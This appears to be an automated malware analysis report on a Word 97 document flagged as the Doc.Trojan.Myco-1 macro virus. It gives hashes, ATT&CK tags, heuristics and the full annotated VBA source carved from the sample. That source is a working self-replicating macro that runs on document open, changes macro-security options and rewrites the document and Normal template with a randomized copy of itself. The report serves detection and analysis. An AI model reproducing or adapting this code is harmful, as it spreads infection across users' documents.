Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 385e9c794b24e399…

MALICIOUS

Office (OLE)

30.0 KB Created: 2000-04-14 23:20:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 77bba2f168de83fbffffd5a7a9a935c7 SHA-1: 048ceee9c93fe70520aeaae055a301df71b0cfbf SHA-256: 385e9c794b24e399857fe6b1ec42b81c1b952e16defbd1bccb827272d53aadad
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a high-severity heuristic indicating a Document_Open macro, and a critical ClamAV detection for 'Doc.Trojan.Myco-1'. The VBA macro code appears to be obfuscated, but it attempts to manipulate macro security settings and potentially execute further malicious code. The presence of the Document_Open macro strongly suggests an attempt to deliver a malicious payload via a spearphishing attachment.

Heuristics 3

  • ClamAV: Doc.Trojan.Myco-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Myco-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3546 bytes
SHA-256: 7e3a803fccad07272c1af63880bd94e66e20f6b0e5384fe2d80156cdd5bb0b1f
Preview script
First 1,000 lines of the extracted script
' Module attributes of the carved "ThisDocument" class module (the document's
' own code module, derived from the Normal template per VB_Base / VB_TemplateDerived).
' These are export-time metadata, not executable statements.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst annotation (defensive): auto-run handler fired when the document is opened
' (OLE_VBA_DOCOPEN). The body builds a regenerated copy of its own source from a table
' of equivalent object-path aliases chosen with Rnd, then writes that copy over the code
' module of both the open document and the Normal template, and saves the document.
' Detection hooks visible below: VBProject / VBComponents / CodeModule access,
' Options.VirusProtection assignment, DeleteLines + AddFromString on NormalTemplate.
Private Sub Document_Open()
' A(1..30) are string fragments; A(31..39) are the generated lines of the next copy.
Dim A(1 To 39) As String
' A(1..9): nine spellings of the ActiveDocument object path.
A(1) = "ActiveDocument"
A(2) = "Word.ActiveDocument"
A(3) = "Application.ActiveDocument"
A(4) = "Word.Application.ActiveDocument"
A(5) = "System.Application.ActiveDocument"
A(6) = "AddIns.Application.ActiveDocument"
A(7) = "Bookmarks.Application.ActiveDocument"
A(8) = "Documents.Application.ActiveDocument"
A(9) = "Word.System.Application.ActiveDocument"
' A(10..18): nine spellings of the NormalTemplate object path.
A(10) = "NormalTemplate"
A(11) = "Word.NormalTemplate"
A(12) = "Application.NormalTemplate"
A(13) = "Word.Application.NormalTemplate"
A(14) = "System.Application.NormalTemplate"
A(15) = "AddIns.Application.NormalTemplate"
A(16) = "Bookmarks.Application.NormalTemplate"
A(17) = "Documents.Application.NormalTemplate"
A(18) = "Word.System.Application.NormalTemplate"
' A(19..22): spellings of the Options object path.
A(19) = "Options"
A(20) = "Word.Options"
A(21) = "Application.Options"
A(22) = "Word.Application.Options"
' A(23..26): ways of addressing the first / "ThisDocument" VBComponent.
A(23) = ".VBProject.VBComponents(1)"
A(24) = ".VBProject.VBComponents.Item(1)"
A(25) = ".VBProject.VBComponents(""ThisDocument"")"
A(26) = ".VBProject.VBComponents.Item(""ThisDocument"")"
' A(27..30): right-hand-side literals for the Options assignments. Only 27..29 are
' ever selected (Int(Rnd * 3) + 27); "Yes" is an undeclared name, so its effective
' value at runtime is not established by this listing.
A(27) = "0"
A(28) = "Yes"
A(29) = "True "
A(30) = "False"
' A(31): the source text of the MyCode assignment itself (see the live statement
' further down), so the regenerated copy can rebuild itself again.
A(31) = "MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 41) & vbCrLf & A(31) & vbCrLf & A(32) & vbCrLf & A(33) & vbCrLf & A(34) & vbCrLf & A(35) & vbCrLf & A(36) & vbCrLf & A(37) & vbCrLf & A(38) & vbCrLf & A(39) & vbCrLf & ""End Sub"""
' A(32..34): Options assignments with a random alias (19..21) and literal (27..29).
' The VirusProtection line is the macro-security manipulation the report flags.
A(32) = A(Int((Rnd * 3) + 19)) & ".VirusProtection = " & A(Int((Rnd * 3) + 27))
A(33) = A(Int((Rnd * 3) + 19)) & ".SaveNormalPrompt = " & A(Int((Rnd * 3) + 27))
A(34) = A(Int((Rnd * 3) + 19)) & ".ConfirmConversions = " & A(Int((Rnd * 3) + 27))
' A(35..36): clear the active document's code module (ActiveDocument alias 1..8,
' component accessor 23..25) and insert MyCode.
A(35) = A(Int((Rnd * 8) + 1)) & A(Int((Rnd * 3) + 23)) & ".CodeModule.DeleteLines 1, " & A(Int((Rnd * 8) + 1)) & A(Int((Rnd * 3) + 23)) & ".CodeModule.CountOfLines"
A(36) = A(Int((Rnd * 8) + 1)) & A(Int((Rnd * 3) + 23)) & ".CodeModule.AddFromString MyCode"
' A(37..38): same two steps against the Normal template (alias 10..17).
A(37) = A(Int((Rnd * 8) + 10)) & A(Int((Rnd * 3) + 23)) & ".CodeModule.DeleteLines 1, " & A(Int((Rnd * 8) + 10)) & A(Int((Rnd * 3) + 23)) & ".CodeModule.CountOfLines"
A(38) = A(Int((Rnd * 8) + 10)) & A(Int((Rnd * 3) + 23)) & ".CodeModule.AddFromString MyCode"
' A(39): SaveAs of the active document over its own FullName.
A(39) = A(Int((Rnd * 8) + 1)) & ".SaveAs FileName:=" & A(Int((Rnd * 8) + 1)) & ".FullName"
' Assemble the next copy: the first 41 module lines (Private Sub through A(39)
' in this listing) unchanged, then the freshly randomized A(31..39), then End Sub.
' The hard-coded 41 ties the routine to its exact line layout.
MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 41) & vbCrLf & A(31) & vbCrLf & A(32) & vbCrLf & A(33) & vbCrLf & A(34) & vbCrLf & A(35) & vbCrLf & A(36) & vbCrLf & A(37) & vbCrLf & A(38) & vbCrLf & A(39) & vbCrLf & "End Sub"
' Lines below are one concrete realization of A(32..39) as carved from this sample;
' a regenerated copy will differ in the aliases and literals chosen.
Word.Options.VirusProtection = True 
Application.Options.SaveNormalPrompt = 0
Application.Options.ConfirmConversions = Yes
System.Application.ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
Word.Application.ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString MyCode
System.Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, Application.NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
Bookmarks.Application.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString MyCode
System.Application.ActiveDocument.SaveAs FileName:=Documents.Application.ActiveDocument.FullName
End Sub